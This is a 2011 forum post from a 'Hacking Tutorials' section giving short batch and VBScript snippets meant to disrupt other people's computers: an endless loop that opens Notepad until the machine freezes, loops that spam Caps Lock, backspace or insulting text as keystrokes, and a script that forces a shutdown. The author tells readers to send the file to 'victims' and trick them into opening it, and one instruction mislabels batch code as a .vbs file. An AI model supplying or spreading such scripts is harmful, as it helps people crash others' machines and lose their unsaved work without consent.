Okara Cantt - Pakistan's Biggest IT Education Forum
Welcome To OkaraCantt - Pakistan's Biggest IT Education Forum. We Hope You Enjoy Your Visit.

You're Currently Viewing Our Forum As A Guest. This Means You Are Limited To Certain Areas Of The Board And There Are Some Features You Can't Use. If You Join Our Community, You'll Be Able To Access Member-Only Sections, And Use Many Member-Only Features Such As Customizing Your Profile, Sending Personal Messages, And Voting In Polls. Registration Is Simple, Fast, And Completely Free.
Okara Cantt - Pakistan's Biggest IT Education Forum
Welcome To OkaraCantt - Pakistan's Biggest IT Education Forum. We Hope You Enjoy Your Visit.

You're Currently Viewing Our Forum As A Guest. This Means You Are Limited To Certain Areas Of The Board And There Are Some Features You Can't Use. If You Join Our Community, You'll Be Able To Access Member-Only Sections, And Use Many Member-Only Features Such As Customizing Your Profile, Sending Personal Messages, And Voting In Polls. Registration Is Simple, Fast, And Completely Free.
Okara Cantt - Pakistan's Biggest IT Education Forum
Would you like to react to this message? Create an account in a few clicks or log in to continue.



 
HomeLatest imagesSearchRegisterLog in

 

 [TuT] How to freez or crash computers

Go down 
AuthorMessage
Capstan
Failure is only a temporary change
Failure is only a temporary change
Capstan


Join date : 2011-05-06
Posts : 71
Points : 192
Reputation : 6
Gender : Male
Browser : [TuT] How to freez or crash computers 218
Location : ^_^Pakistan^_^

[TuT] How to freez or crash computers Empty
PostSubject: [TuT] How to freez or crash computers   [TuT] How to freez or crash computers I_icon_minitimeTue Dec 06, 2011 2:46 pm

This will pop up endless notepads until the computer freezes and crashes. Copy the below code in notepad and save it as ".vbs" extension.

Code:-
Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top




CAPS LOCK CRAZY TRICK
This constantly turns caps lock on and off really fast continuously.

Code:-
Code:
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop



UNLIMITED BACKSPACE HACK
This makes it so the backspace key is constantly being pressed.

Code:-
Code:
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop



Hack your friend's keyboard and make him type "You are a fool" simultaneously:

Code:
Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop


Convey your friend a message and shut down his / her computer:

Code:
Code:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s


Save it as "Anything.BAT" in All Files and send it to victims and tell them to open it :)
.
Back to top Go down
 
[TuT] How to freez or crash computers
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Okara Cantt - Pakistan's Biggest IT Education Forum  :: Hacks, Exploits, and Various Discussions :: Hacking Tutorials-
Jump to:  

Chat Room OKaraCantt.CoM

Create a forum on Forumotion | ©phpBB | Free forum support | Report an abuse | Forumotion.com